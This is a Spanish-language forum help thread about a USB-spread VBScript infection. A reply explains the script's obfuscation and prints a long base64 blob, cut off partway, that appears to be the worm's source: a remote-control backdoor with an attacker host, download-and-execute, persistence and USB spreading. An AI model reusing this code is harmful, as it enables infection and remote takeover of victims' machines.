Título: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: TheChivo en 16 Octubre 2013, 07:19 am
Hola, pues mi hermano trajo una USB y el no tiene mucha conciencia de las medidas de seguridad para abrir un dispositivo que ha estado en una maquina publica, la cosa es que se me infecto la computadora y pude llegar al culpable, es un script de visual basic llamado "fyzbnaksvu..vbs" (si, lleva 2 puntos)
Les pongo aqui el "codigo fuente" que encontre al abrie el vbs con bloc de notas: (la pondre en pastebin, espero que en el foro ya implementen la opcion de poner spoilers o cajas de texto que me cortó cuando quise publicarlo en un bloque CODE)
http://pastebin.com/NH8nYxub (http://pastebin.com/NH8nYxub)
Si alguien puede decirme que hace y como deshacerme de el, le estaria muy agradecido, digo, acabo de formatear con W8 hace 5 dias y ya pasa esto? XD
Bueno, de antemano, muchas gracias. Saludos!
Título: Re: Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: Mad Antrax en 16 Octubre 2013, 11:14 am
Hola, pues mi hermano trajo una USB y el no tiene mucha conciencia de las medidas de seguridad para abrir un dispositivo que ha estado en una maquina publica, la cosa es que se me infecto la computadora y pude llegar al culpable, es un script de visual basic llamado "fyzbnaksvu..vbs" (si, lleva 2 puntos)
Les pongo aqui el "codigo fuente" que encontre al abrie el vbs con bloc de notas: (la pondre en pastebin, espero que en el foro ya implementen la opcion de poner spoilers o cajas de texto que me cortó cuando quise publicarlo en un bloque CODE)
http://pastebin.com/NH8nYxub (http://pastebin.com/NH8nYxub)
Si alguien puede decirme que hace y como deshacerme de el, le estaria muy agradecido, digo, acabo de formatear con W8 hace 5 dias y ya pasa esto? XD
Bueno, de antemano, muchas gracias. Saludos!
Hola!! Gracias por publicar semejante código, está muy bien programado y es interesante :P, el "virus" está enmascarado con 2 cifrados, el primero es una simple codificación ascii, se puede resolver añadiendo el siguiente código al final (quitando el EXECUTEGLOBAL): Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.CreateTextFile("dump.txt", True) a.WriteLine(AAA) a.Close
El código devuelve un fichero llamado dump.txt con el primer "cifrado" resuelto: ABC = deCrypt("JzxbIHJlY29kZXIgOiBob3VkaW5pIChjKSBza3lwZSA6IGhvdWRpbmktZnggXT4NCg0KJz0tPS09LT0tPSBjb25maWcgPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0NCg0KaG9zdCA9ICJ1cGRhdGUtZmxhc2guc2VydmVodHRwLmNvbSINCnBvcnQgPSA2NjYNCmluc3RhbGxkaXIgPSAiJXRlbXAlIg0KbG5rZmlsZSA9IHRydWUNCmxua2ZvbGRlciA9IHRydWUNCg0KJz0tPS09LT0tPSBwdWJsaWMgdmFyID0tPS09LT0tPS09LT0tPS09LT0tPS09LT0NCg0KZGltIHNoZWxsb2JqIA0Kc2V0IHNoZWxsb2JqID0gd3NjcmlwdC5jcmVhdGVvYmplY3QoIndzY3JpcHQuc2hlbGwiKQ0KZGltIGZpbGVzeXN0ZW1vYmoNCnNldCBmaWxlc3lzdGVtb2JqID0gY3JlYXRlb2JqZWN0KCJzY3JpcHRpbmcuZmlsZXN5c3RlbW9iamVjdCIpDQpkaW0gaHR0cG9iag0Kc2V0IGh0dHBvYmogPSBjcmVhdGVvYmplY3QoIm1zeG1sMi54bWxodHRwIikNCg0KDQonPS09LT0tPS09IHByaXZhdCB2YXIgPS09LT0tPS09LT0tPS09LT0tPS09LT0NCg0KaW5zdGFsbG5hbWUgPSB3c2NyaXB0LnNjcmlwdG5hbWUNCnN0YXJ0dXAgPSBzaGVsbG9iai5zcGVjaWFsZm9sZGVycyAoInN0YXJ0dXAiKSAmICJcIg0KaW5zdGFsbGRpciA9IHNoZWxsb2JqLmV4cGFuZGVudmlyb25tZW50c3RyaW5ncyhpbnN0YWxsZGlyKSAmICJcIg0KaWYgbm90IGZpbGVzeXN0ZW1vYmouZm9sZGVyZXhpc3RzKGluc3RhbGxkaXIpIHRoZW4gIGluc3RhbGxkaXIgPSBzaGVsbG9iai5leHBhbmRlbnZpcm9ubWVudHN0cmluZ3MoIiV0ZW1wJSIpICYgIlwiDQpzcGxpdGVyID0gIjwiICYgInwiICYgIj4iDQpzbGVlcCA9IDUwMDAgDQpkaW0gcmVzcG9uc2UNCmRpbSBjbWQNCmRpbSBwYXJhbQ0KaW5mbyA9ICIiDQp1c2JzcHJlYWRpbmcgPSAiIg0Kc3RhcnRkYXRlID0gIiINCmRpbSBvbmVvbmNlDQoNCic9LT0tPS09LT0gY29kZSBzdGFydCA9LT0tPS09LT0tPS09LT0tPS09LT0tPQ0Kb24gZXJyb3IgcmVzdW1lIG5leHQNCg0KDQppbnN0YW5jZQ0Kd2hpbGUgdHJ1ZQ0KDQppbnN0YWxsDQoNCnJlc3BvbnNlID0gIiINCnJlc3BvbnNlID0gcG9zdCAoImlzLXJlYWR5IiwiIikNCmNtZCA9IHNwbGl0IChyZXNwb25zZSxzcGxpdGVyKQ0Kc2VsZWN0IGNhc2UgY21kICgwKQ0KY2FzZSAiZXhjZWN1dGUiDQogICAgICBwYXJhbSA9IGNtZCAoMSkNCiAgICAgIGV4ZWN1dGUgcGFyYW0NCmNhc2UgInVwZGF0ZSINCiAgICAgIHBhcmFtID0gY21kICgxKQ0KICAgICAgb25lb25jZS5jbG9zZQ0KICAgICAgc2V0IG9uZW9uY2UgPSAgZmlsZXN5c3RlbW9iai5vcGVudGV4dGZpbGUgKGluc3RhbGxkaXIgJiBpbnN0YWxsbmFtZSAsMiwgZmFsc2UpDQogICAgICBvbmVvbmNlLndyaXRlIHBhcmFtDQogICAgICBvbmVvbmNlLmNsb3NlDQogICAgICBzaGVsbG9iai5ydW4gIndzY3JpcHQuZXhlIC8vQiAiICYgY2hyKDM0KSAmIGluc3RhbGxkaXIgJiBpbnN0YWxsbmFtZSAmIGNocigzNCkNCiAgICAgIHdzY3JpcHQucXVpdCANCmNhc2UgInVuaW5zdGFsbCINCiAgICAgIHVuaW5zdGFsbA0KY2FzZSAic2VuZCINCiAgICAgIGRvd25sb2FkIGNtZCAoMSksY21kICgyKQ0KY2FzZSAic2l0ZS1zZW5kIg0KICAgICAgc2l0ZWRvd25sb2FkZXIgY21kICgxKSxjbWQgKDIpDQpjYXNlICJyZWN2Ig0KICAgICAgcGFyYW0gPSBjbWQgKDEpDQogICAgICB1cGxvYWQgKHBhcmFtKQ0KY2FzZSAgImVudW0tZHJpdmVyIg0KICAgICAgcG9zdCAiaXMtZW51bS1kcml2ZXIiLGVudW1kcml2ZXIgIA0KY2FzZSAgImVudW0tZmFmIg0KICAgICAgcGFyYW0gPSBjbWQgKDEpDQogICAgICBwb3N0ICJpcy1lbnVtLWZhZiIsZW51bWZhZiAocGFyYW0pDQpjYXNlICAiZW51bS1wcm9jZXNzIg0KICAgICAgcG9zdCAiaXMtZW51bS1wcm9jZXNzIixlbnVtcHJvY2VzcyAgIA0KY2FzZSAgImNtZC1zaGVsbCINCiAgICAgIHBhcmFtID0gY21kICgxKQ0KICAgICAgcG9zdCAiaXMtY21kLXNoZWxsIixjbWRzaGVsbCAocGFyYW0pICANCmNhc2UgICJkZWxldGUiDQogICAgICBwYXJhbSA9IGNtZCAoMSkNCiAgICAgIGRlbGV0ZWZhZiAocGFyYW0pIA0KY2FzZSAgImV4aXQtcHJvY2VzcyINCiAgICAgIHBhcmFtID0gY21kICgxKQ0KICAgICAgZXhpdHByb2Nlc3MgKHBhcmFtKSANCmNhc2UgICJzbGVlcCINCiAgICAgIHBhcmFtID0gY21kICgxKQ0KICAgICAgc2xlZXAgPSBldmFsIChwYXJhbSkgICAgICAgIA0KZW5kIHNlbGVjdA0KDQp3c2NyaXB0LnNsZWVwIHNsZWVwDQoNCndlbmQNCg0KDQpzdWIgaW5zdGFsbA0Kb24gZXJyb3IgcmVzdW1lIG5leHQNCmRpbSBsbmtvYmoNCmRpbSBmaWxlbmFtZQ0KZGltIGZvbGRlcm5hbWUNCmRpbSBmaWxlaWNvbg0KZGltIGZvbGRlcmljb24NCg0KdXBzdGFydA0KZm9yIGVhY2ggZHJpdmUgaW4gZmlsZXN5c3RlbW9iai5kcml2ZXMNCg0KaWYgIGRyaXZlLmlzcmVhZHkgPSB0cnVlIHRoZW4NCmlmICBkcml2ZS5mcmVlc3BhY2UgID4gMCB0aGVuDQppZiAgZHJpdmUuZHJpdmV0eXBlICA9IDEgdGhlbg0KICAgIGZpbGVzeXN0ZW1vYmouY29weWZpbGUgd3NjcmlwdC5zY3JpcHRmdWxsbmFtZSAsIGRyaXZlLnBhdGggJiAiXCIgJiBpbnN0YWxsbmFtZSx0cnVlDQogICAgaWYgIGZpbGVzeXN0ZW1vYmouZmlsZWV4aXN0cyAoZHJpdmUucGF0aCAmICJcIiAmIGluc3RhbGxuYW1lKSAgdGhlbg0KICAgICAgICBmaWxlc3lzdGVtb2JqLmdldGZpbGUoZHJpdmUucGF0aCAmICJcIiAgJiBpbnN0YWxsbmFtZSkuYXR0cmlidXRlcyA9IDIrNA0KICAgIGVuZCBpZg0KICAgIGZvciBlYWNoIGZpbGUgaW4gZmlsZXN5c3RlbW9iai5nZXRmb2xkZXIoIGRyaXZlLnBhdGggJiAiXCIgKS5GaWxlcw0KICAgICAgICBpZiBub3QgbG5rZmlsZSB0aGVuIGV4aXQgZm9yDQogICAgICAgIGlmICBpbnN0ciAoZmlsZS5uYW1lLCIuIikgdGhlbg0KICAgICAgICAgICAgaWYgIGxjYXNlIChzcGxpdChmaWxlLm5hbWUsICIuIikgKHVib3VuZChzcGxpdChmaWxlLm5hbWUsICIuIikpKSkgPD4gImxuayIgdGhlbg0KICAgICAgICAgICAgICAgIGZpbGUuYXR0cmlidXRlcyA9IDIrNA0KICAgICAgICAgICAgICAgIGlmICB1Y2FzZSAoZmlsZS5uYW1lKSA8PiB1Y2FzZSAoaW5zdGFsbG5hbWUpIHRoZW4NCiAgICAgICAgICAgICAgICAgICAgZmlsZW5hbWUgPSBzcGxpdChmaWxlLm5hbWUsIi4iKQ0KICAgICAgICAgICAgICAgICAgICBzZXQgbG5rb2JqID0gc2hlbGxvYmouY3JlYXRlc2hvcnRjdXQgKGRyaXZlLnBhdGggJiAiXCIgICYgZmlsZW5hbWUgKDApICYgIi5sbmsiKSANCiAgICAgICAgICAgICAgICAgICAgbG5rb2JqLndpbmRvd3N0eWxlID0gNw0KICAgICAgICAgICAgICAgICAgICBsbmtvYmoudGFyZ2V0cGF0aCA9ICJjbWQuZXhlIg0KICAgICAgICAgICAgICAgICAgICBsbmtvYmoud29ya2luZ2RpcmVjdG9yeSA9ICIiDQogICAgICAgICAgICAgICAgICAgIGxua29iai5hcmd1bWVudHMgPSAiL2Mgc3RhcnQgIiAmIHJlcGxhY2UoaW5zdGFsbG5hbWUsIiAiLCBjaHJ3KDM0KSAmICIgIiAmIGNocncoMzQpKSAmICImc3RhcnQgIiAmIHJlcGxhY2UoZmlsZS5uYW1lLCIgIiwgY2hydygzNCkgJiAiICIgJiBjaHJ3KDM0KSkgJiImZXhpdCINCiAgICAgICAgICAgICAgICAgICAgZmlsZWljb24gPSBzaGVsbG9iai5yZWdyZWFkICgiSEtFWV9MT0NBTF9NQUNISU5FXHNvZnR3YXJlXGNsYXNzZXNcIiAmIHNoZWxsb2JqLnJlZ3JlYWQgKCJIS0VZX0xPQ0FMX01BQ0hJTkVcc29mdHdhcmVcY2xhc3Nlc1wuIiAmIHNwbGl0KGZpbGUubmFtZSwgIi4iKSh1Ym91bmQoc3BsaXQoZmlsZS5uYW1lLCAiLiIpKSkmICJcIikgJiAiXGRlZmF1bHRpY29uXCIpIA0KICAgICAgICAgICAgICAgICAgICBpZiAgaW5zdHIgKGZpbGVpY29uLCIsIikgPSAwIHRoZW4NCiAgICAgICAgICAgICAgICAgICAgICAgIGxua29iai5pY29ubG9jYXRpb24gPSBmaWxlLnBhdGgNCiAgICAgICAgICAgICAgICAgICAgZWxzZSANCiAgICAgICAgICAgICAgICAgICAgICAgIGxua29iai5pY29ubG9jYXRpb24gPSBmaWxlaWNvbg0KICAgICAgICAgICAgICAgICAgICBlbmQgaWYNCiAgICAgICAgICAgICAgICAgICAgbG5rb2JqLnNhdmUoKQ0KICAgICAgICAgICAgICAgIGVuZCBpZg0KICAgICAgICAgICAgZW5kIGlmDQogICAgICAgIGVuZCBpZg0KICAgIG5leHQNCiAgICBmb3IgZWFjaCBmb2xkZXIgaW4gZmlsZXN5c3RlbW9iai5nZXRmb2xkZXIoIGRyaXZlLnBhdGggJiAiXCIgKS5zdWJmb2xkZXJzDQogICAgICAgIGlmIG5vdCBsbmtmb2xkZXIgdGhlbiBleGl0IGZvcg0KICAgICAgICBmb2xkZXIuYXR0cmlidXRlcyA9IDIrNA0KICAgICAgICBmb2xkZXJuYW1lID0gZm9sZGVyLm5hbWUNCiAgICAgICAgc2V0IGxua29iaiA9IHNoZWxsb2JqLmNyZWF0ZXNob3J0Y3V0IChkcml2ZS5wYXRoICYgIlwiICAmIGZvbGRlcm5hbWUgJiAiLmxuayIpIA0KICAgICAgICBsbmtvYmoud2luZG93c3R5bGUgPSA3DQogICAgICAgIGxua29iai50YXJnZXRwYXRoID0gImNtZC5leGUiDQogICAgICAgIGxua29iai53b3JraW5nZGlyZWN0b3J5ID0gIiINCiAgICAgICAgbG5rb2JqLmFyZ3VtZW50cyA9ICIvYyBzdGFydCAiICYgcmVwbGFjZShpbnN0YWxsbmFtZSwiICIsIGNocncoMzQpICYgIiAiICYgY2hydygzNCkpICYgIiZzdGFydCBleHBsb3JlciAiICYgcmVwbGFjZShmb2xkZXIubmFtZSwiICIsIGNocncoMzQpICYgIiAiICYgY2hydygzNCkpICYiJmV4aXQiDQogICAgICAgIGZvbGRlcmljb24gPSBzaGVsbG9iai5yZWdyZWFkICgiSEtFWV9MT0NBTF9NQUNISU5FXHNvZnR3YXJlXGNsYXNzZXNcZm9sZGVyXGRlZmF1bHRpY29uXCIpIA0KICAgICAgICBpZiAgaW5zdHIgKGZvbGRlcmljb24sIiwiKSA9IDAgdGhlbg0KICAgICAgICAgICAgbG5rb2JqLmljb25sb2NhdGlvbiA9IGZvbGRlci5wYXRoDQogICAgICAgIGVsc2UgDQogICAgICAgICAgICBsbmtvYmouaWNvbmxvY2F0aW9uID0gZm9sZGVyaWNvbg0KICAgICAgICBlbmQgaWYNCiAgICAgICAgbG5rb2JqLnNhdmUoKQ0KICAgIG5leHQNCmVuZCBJZg0KZW5kIElmDQplbmQgaWYNCm5leHQNCmVyci5jbGVhcg0KZW5kIHN1Yg0KDQpzdWIgdW5pbnN0YWxsDQpvbiBlcnJvciByZXN1bWUgbmV4dA0KZGltIGZpbGVuYW1lDQpkaW0gZm9sZGVybmFtZQ0KDQpzaGVsbG9iai5yZWdkZWxldGUgIkhLRVlfQ1VSUkVOVF9VU0VSXHNvZnR3YXJlXG1pY3Jvc29mdFx3aW5kb3dzXGN1cnJlbnR2ZXJzaW9uXHJ1blwiICYgc3BsaXQgKGluc3RhbGxuYW1lLCIuIikoMCkNCnNoZWxsb2JqLnJlZ2RlbGV0ZSAiSEtFWV9MT0NBTF9NQUNISU5FXHNvZnR3YXJlXG1pY3Jvc29mdFx3aW5kb3dzXGN1cnJlbnR2ZXJzaW9uXHJ1blwiICYgc3BsaXQgKGluc3RhbGxuYW1lLCIuIikoMCkNCmZpbGVzeXN0ZW1vYmouZGVsZXRlZmlsZSBzdGFydHVwICYgaW5zdGFsbG5hbWUgLHRydWUNCmZpbGVzeXN0ZW1vYmouZGVsZXRlZmlsZSB3c2NyaXB0LnNjcmlwdGZ1bGxuYW1lICx0cnVlDQoNCmZvciAgZWFjaCBkcml2ZSBpbiBmaWxlc3lzdGVtb2JqLmRyaXZlcw0KaWYgIGRyaXZlLmlzcmVhZHkgPSB0cnVlIHRoZW4NCmlmICBkcml2ZS5mcmVlc3BhY2UgID4gMCB0aGVuDQppZiAgZHJpdmUuZHJpdmV0eXBlICA9IDEgdGhlbg0KICAgIGZvciAgZWFjaCBmaWxlIGluIGZpbGVzeXN0ZW1vYmouZ2V0Zm9sZGVyICggZHJpdmUucGF0aCAmICJcIikuZmlsZXMNCiAgICAgICAgIG9uIGVycm9yIHJlc3VtZSBuZXh0DQogICAgICAgICBpZiAgaW5zdHIgKGZpbGUubmFtZSwiLiIpIHRoZW4NCiAgICAgICAgICAgICBpZiAgbGNhc2UgKHNwbGl0KGZpbGUubmFtZSwgIi4iKSh1Ym91bmQoc3BsaXQoZmlsZS5uYW1lLCAiLiIpKSkpIDw+ICJsbmsiIHRoZW4NCiAgICAgICAgICAgICAgICAgZmlsZS5hdHRyaWJ1dGVzID0gMA0KICAgICAgICAgICAgICAgICBpZiAgdWNhc2UgKGZpbGUubmFtZSkgPD4gdWNhc2UgKGluc3RhbGxuYW1lKSB0aGVuDQogICAgICAgICAgICAgICAgICAgICBmaWxlbmFtZSA9IHNwbGl0KGZpbGUubmFtZSwiLiIpDQogICAgICAgICAgICAgICAgICAgICBmaWxlc3lzdGVtb2JqLmRlbGV0ZWZpbGUgKGRyaXZlLnBhdGggJiAiXCIgJiBmaWxlbmFtZSgwKSAmICIubG5rIiApDQogICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgIGZpbGVzeXN0ZW1vYmouZGVsZXRlZmlsZSAoZHJpdmUucGF0aCAmICJcIiAmIGZpbGUubmFtZSkNCiAgICAgICAgICAgICAgICAgZW5kIElmDQogICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgICAgICBmaWxlc3lzdGVtb2JqLmRlbGV0ZWZpbGUgKGZpbGUucGF0aCkgDQogICAgICAgICAgICAgZW5kIGlmDQogICAgICAgICBlbmQgaWYNCiAgICAgbmV4dA0KICAgICBmb3IgZWFjaCBmb2xkZXIgaW4gZmlsZXN5c3RlbW9iai5nZXRmb2xkZXIoIGRyaXZlLnBhdGggJiAiXCIgKS5zdWJmb2xkZXJzDQogICAgICAgICBmb2xkZXIuYXR0cmlidXRlcyA9IDANCiAgICAgbmV4dA0KZW5kIGlmDQplbmQgaWYNCmVuZCBpZg0KbmV4dA0Kd3NjcmlwdC5xdWl0DQplbmQgc3ViDQoNCmZ1bmN0aW9uIHBvc3QgKGNtZCAscGFyYW0pDQoNCnBvc3QgPSBwYXJhbQ0KaHR0cG9iai5vcGVuICJwb3N0IiwiaHR0cDovLyIgJiBob3N0ICYgIjoiICYgcG9ydCAmIi8iICYgY21kLCBmYWxzZQ0KaHR0cG9iai5zZXRyZXF1ZXN0aGVhZGVyICJ1c2VyLWFnZW50OiIsaW5mb3JtYXRpb24NCmh0dHBvYmouc2VuZCBwYXJhbQ0KcG9zdCA9IGh0dHBvYmoucmVzcG9uc2V0ZXh0DQplbmQgZnVuY3Rpb24NCg0KZnVuY3Rpb24gaW5mb3JtYXRpb24NCm9uIGVycm9yIHJlc3VtZSBuZXh0DQppZiAgaW5mID0gIiIgdGhlbg0KICAgIGluZiA9IGh3aWQgJiBzcGxpdGVyIA0KICAgIGluZiA9IGluZiAgJiBzaGVsbG9iai5leHBhbmRlbnZpcm9ubWVudHN0cmluZ3MoIiVjb21wdXRlcm5hbWUlIikgJiBzcGxpdGVyIA0KICAgIGluZiA9IGluZiAgJiBzaGVsbG9iai5leHBhbmRlbnZpcm9ubWVudHN0cmluZ3MoIiV1c2VybmFtZSUiKSAmIHNwbGl0ZXINCg0KICAgIHNldCByb290ID0gZ2V0b2JqZWN0KCJ3aW5tZ210czp7aW1wZXJzb25hdGlvbmxldmVsPWltcGVyc29uYXRlfSFcXC5ccm9vdFxjaW12MiIpDQogICAgc2V0IG9zID0gcm9vdC5leGVjcXVlcnkgKCJzZWxlY3QgKiBmcm9tIHdpbjMyX29wZXJhdGluZ3N5c3RlbSIpDQogICAgZm9yIGVhY2ggb3NpbmZvIGluIG9zDQogICAgICAgaW5mID0gaW5mICYgb3NpbmZvLmNhcHRpb24gJiBzcGxpdGVyICANCiAgICAgICBleGl0IGZvcg0KICAgIG5leHQNCiAgICBpbmYgPSBpbmYgJiAicGx1cyIgJiBzcGxpdGVyDQogICAgaW5mID0gaW5mICYgc2VjdXJpdHkgJiBzcGxpdGVyDQogICAgaW5mID0gaW5mICYgdXNic3ByZWFkaW5nDQogICAgaW5mb3JtYXRpb24gPSBpbmYgIA0KZWxzZQ0KICAgIGluZm9ybWF0aW9uID0gaW5mDQplbmQgaWYNCmVuZCBmdW5jdGlvbg0KDQoNCnN1YiB1cHN0YXJ0ICgpDQpvbiBlcnJvciByZXN1bWUgTmV4dA0KDQpzaGVsbG9iai5yZWd3cml0ZSAiSEtFWV9DVVJSRU5UX1VTRVJcc29mdHdhcmVcbWljcm9zb2Z0XHdpbmRvd3NcY3VycmVudHZlcnNpb25ccnVuXCIgJiBzcGxpdCAoaW5zdGFsbG5hbWUsIi4iKSgwKSwgICJ3c2NyaXB0LmV4ZSAvL0IgIiAmIGNocncoMzQpICYgaW5zdGFsbGRpciAmIGluc3RhbGxuYW1lICYgY2hydygzNCkgLCAiUkVHX1NaIg0Kc2hlbGxvYmoucmVnd3JpdGUgIkhLRVlfTE9DQUxfTUFDSElORVxzb2Z0d2FyZVxtaWNyb3NvZnRcd2luZG93c1xjdXJyZW50dmVyc2lvblxydW5cIiAmIHNwbGl0IChpbnN0YWxsbmFtZSwiLiIpKDApLCAgIndzY3JpcHQuZXhlIC8vQiAiICAmIGNocncoMzQpICYgaW5zdGFsbGRpciAmIGluc3RhbGxuYW1lICYgY2hydygzNCkgLCAiUkVHX1NaIg0KZmlsZXN5c3RlbW9iai5jb3B5ZmlsZSB3c2NyaXB0LnNjcmlwdGZ1bGxuYW1lLGluc3RhbGxkaXIgJiBpbnN0YWxsbmFtZSx0cnVlDQpmaWxlc3lzdGVtb2JqLmNvcHlmaWxlIHdzY3JpcHQuc2NyaXB0ZnVsbG5hbWUsc3RhcnR1cCAmIGluc3RhbGxuYW1lICx0cnVlDQoNCmVuZCBzdWINCg0KDQpmdW5jdGlvbiBod2lkDQpvbiBlcnJvciByZXN1bWUgbmV4dA0KDQpzZXQgcm9vdCA9IGdldG9iamVjdCgid2lubWdtdHM6e2ltcGVyc29uYXRpb25sZXZlbD1pbXBlcnNvbmF0ZX0hXFwuXHJvb3RcY2ltdjIiKQ0Kc2V0IGRpc2tzID0gcm9vdC5leGVjcXVlcnkgKCJzZWxlY3QgKiBmcm9tIHdpbjMyX2xvZ2ljYWxkaXNrIikNCmZvciBlYWNoIGRpc2sgaW4gZGlza3MNCiAgICBpZiAgZGlzay52b2x1bWVzZXJpYWxudW1iZXIgPD4gIiIgdGhlbg0KICAgICAgICBod2lkID0gZGlzay52b2x1bWVzZXJpYWxudW1iZXINCiAgICAgICAgZXhpdCBmb3INCiAgICBlbmQgaWYNCm5leHQNCmVuZCBmdW5jdGlvbg0KDQoNCmZ1bmN0aW9uIHNlY3VyaXR5IA0Kb24gZXJyb3IgcmVzdW1lIG5leHQNCg0Kc2VjdXJpdHkgPSAiIg0KDQpzZXQgb2Jqd21pc2VydmljZSA9IGdldG9iamVjdCgid2lubWdtdHM6e2ltcGVyc29uYXRpb25sZXZlbD1pbXBlcnNvbmF0ZX0hXFwuXHJvb3RcY2ltdjIiKQ0Kc2V0IGNvbGl0ZW1zID0gb2Jqd21pc2VydmljZS5leGVjcXVlcnkoInNlbGVjdCAqIGZyb20gd2luMzJfb3BlcmF0aW5nc3lzdGVtIiwsNDgpDQpmb3IgZWFjaCBvYmppdGVtIGluIGNvbGl0ZW1zDQogICAgdmVyc2lvbnN0ciA9IHNwbGl0IChvYmppdGVtLnZlcnNpb24sIi4iKQ0KbmV4dA0KdmVyc2lvbnN0ciA9IHNwbGl0IChjb2xpdGVtcy52ZXJzaW9uLCIuIikNCm9zdmVyc2lvbiA9IHZlcnNpb25zdHIgKDApICYgIi4iDQpmb3IgIHggPSAxIHRvIHVib3VuZCAodmVyc2lvbnN0cikNCgkgb3N2ZXJzaW9uID0gb3N2ZXJzaW9uICYgIHZlcnNpb25zdHIgKGkpDQpuZXh0DQpvc3ZlcnNpb24gPSBldmFsIChvc3ZlcnNpb24pDQppZiAgb3N2ZXJzaW9uID4gNiB0aGVuIHNjID0gInNlY3VyaXR5Y2VudGVyMiIgZWxzZSBzYyA9ICJzZWN1cml0eWNlbnRlciINCg0Kc2V0IG9ianNlY3VyaXR5Y2VudGVyID0gZ2V0b2JqZWN0KCJ3aW5tZ210czpcXGxvY2FsaG9zdFxyb290XCIgJiBzYykNClNldCBjb2xhbnRpdmlydXMgPSBvYmpzZWN1cml0eWNlbnRlci5leGVjcXVlcnkoInNlbGVjdCAqIGZyb20gYW50aXZpcnVzcHJvZHVjdCIsIndxbCIsMCkNCg0KZm9yIGVhY2ggb2JqYW50aXZpcnVzIGluIGNvbGFudGl2aXJ1cw0KICAgIHNlY3VyaXR5ICA9IHNlY3VyaXR5ICAmIG9iamFudGl2aXJ1cy5kaXNwbGF5bmFtZSAmICIgLiINCm5leHQNCmlmIHNlY3VyaXR5ICA9ICIiIHRoZW4gc2VjdXJpdHkgID0gIm5hbi1hdiINCmVuZCBmdW5jdGlvbg0KDQoNCmZ1bmN0aW9uIGluc3RhbmNlDQpvbiBlcnJvciByZXN1bWUgbmV4dA0KDQp1c2JzcHJlYWRpbmcgPSBzaGVsbG9iai5yZWdyZWFkICgiSEtFWV9MT0NBTF9NQUNISU5FXHNvZnR3YXJlXCIgJiBzcGxpdCAoaW5zdGFsbG5hbWUsIi4iKSgwKSAmICJcIikNCmlmIHVzYnNwcmVhZGluZyA9ICIiIHRoZW4NCiAgIGlmIGxjYXNlICggbWlkKHdzY3JpcHQuc2NyaXB0ZnVsbG5hbWUsMikpID0gIjpcIiAmICBsY2FzZShpbnN0YWxsbmFtZSkgdGhlbg0KICAgICAgdXNic3ByZWFkaW5nID0gInRydWUgLSAiICYgZGF0ZQ0KICAgICAgc2hlbGxvYmoucmVnd3JpdGUgIkhLRVlfTE9DQUxfTUFDSElORVxzb2Z0d2FyZVwiICYgc3BsaXQgKGluc3RhbGxuYW1lLCIuIikoMCkgICYgIlwiLCAgdXNic3ByZWFkaW5nLCAiUkVHX1NaIg0KICAgZWxzZQ0KICAgICAgdXNic3ByZWFkaW5nID0gImZhbHNlIC0gIiAmIGRhdGUNCiAgICAgIHNoZWxsb2JqLnJlZ3dyaXRlICJIS0VZX0xPQ0FMX01BQ0hJTkVcc29mdHdhcmVcIiAmIHNwbGl0IChpbnN0YWxsbmFtZSwiLiIpKDApICAmICJcIiwgIHVzYnNwcmVhZGluZywgIlJFR19TWiINCg0KICAgZW5kIGlmDQplbmQgSWYNCg0KDQoNCnVwc3RhcnQNCnNldCBzY3JpcHRmdWxsbmFtZXNob3J0ID0gIGZpbGVzeXN0ZW1vYmouZ2V0ZmlsZSAod3NjcmlwdC5zY3JpcHRmdWxsbmFtZSkNCnNldCBpbnN0YWxsZnVsbG5hbWVzaG9ydCA9ICBmaWxlc3lzdGVtb2JqLmdldGZpbGUgKGluc3RhbGxkaXIgJiBpbnN0YWxsbmFtZSkNCmlmICBsY2FzZSAoc2NyaXB0ZnVsbG5hbWVzaG9ydC5zaG9ydHBhdGgpIDw+IGxjYXNlIChpbnN0YWxsZnVsbG5hbWVzaG9ydC5zaG9ydHBhdGgpIHRoZW4gDQogICAgc2hlbGxvYmoucnVuICJ3c2NyaXB0LmV4ZSAvL0IgIiAmIGNocigzNCkgJiBpbnN0YWxsZGlyICYgaW5zdGFsbG5hbWUgJiBDaHIoMzQpDQogICAgd3NjcmlwdC5xdWl0IA0KZW5kIElmDQplcnIuY2xlYXINCnNldCBvbmVvbmNlID0gZmlsZXN5c3RlbW9iai5vcGVudGV4dGZpbGUgKGluc3RhbGxkaXIgJiBpbnN0YWxsbmFtZSAsOCwgZmFsc2UpDQppZiAgZXJyLm51bWJlciA+IDAgdGhlbiB3c2NyaXB0LnF1aXQNCmVuZCBmdW5jdGlvbg0KDQoNCnN1YiBzaXRlZG93bmxvYWRlciAoZmlsZXVybCxmaWxlbmFtZSkNCg0Kc3RybGluayA9IGZpbGV1cmwNCnN0cnNhdmV0byA9IGluc3RhbGxkaXIgJiBmaWxlbmFtZQ0Kc2V0IG9iamh0dHBkb3dubG9hZCA9IGNyZWF0ZW9iamVjdCgibXN4bWwyLnhtbGh0dHAiICkNCm9iamh0dHBkb3dubG9hZC5vcGVuICJnZXQiLCBzdHJsaW5rLCBmYWxzZQ0Kb2JqaHR0cGRvd25sb2FkLnNlbmQNCg0Kc2V0IG9iamZzb2Rvd25sb2FkID0gY3JlYXRlb2JqZWN0ICgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKQ0KaWYgIG9iamZzb2Rvd25sb2FkLmZpbGVleGlzdHMgKHN0cnNhdmV0bykgdGhlbg0KICAgIG9iamZzb2Rvd25sb2FkLmRlbGV0ZWZpbGUgKHN0cnNhdmV0bykNCmVuZCBpZg0KIA0KaWYgb2JqaHR0cGRvd25sb2FkLnN0YXR1cyA9IDIwMCB0aGVuDQogICBkaW0gIG9ianN0cmVhbWRvd25sb2FkDQogICBzZXQgIG9ianN0cmVhbWRvd25sb2FkID0gY3JlYXRlb2JqZWN0KCJhZG9kYi5zdHJlYW0iKQ0KICAgd2l0aCBvYmpzdHJlYW1kb3dubG9hZA0KCQkudHlwZSA9IDEgDQoJCS5vcGVuDQoJCS53cml0ZSBvYmpodHRwZG93bmxvYWQucmVzcG9uc2Vib2R5DQoJCS5zYXZldG9maWxlIHN0cnNhdmV0bw0KCQkuY2xvc2UNCiAgIGVuZCB3aXRoDQogICBzZXQgb2Jqc3RyZWFtZG93bmxvYWQgPSBub3RoaW5nDQplbmQgaWYNCmlmIG9iamZzb2Rvd25sb2FkLmZpbGVleGlzdHMoc3Ryc2F2ZXR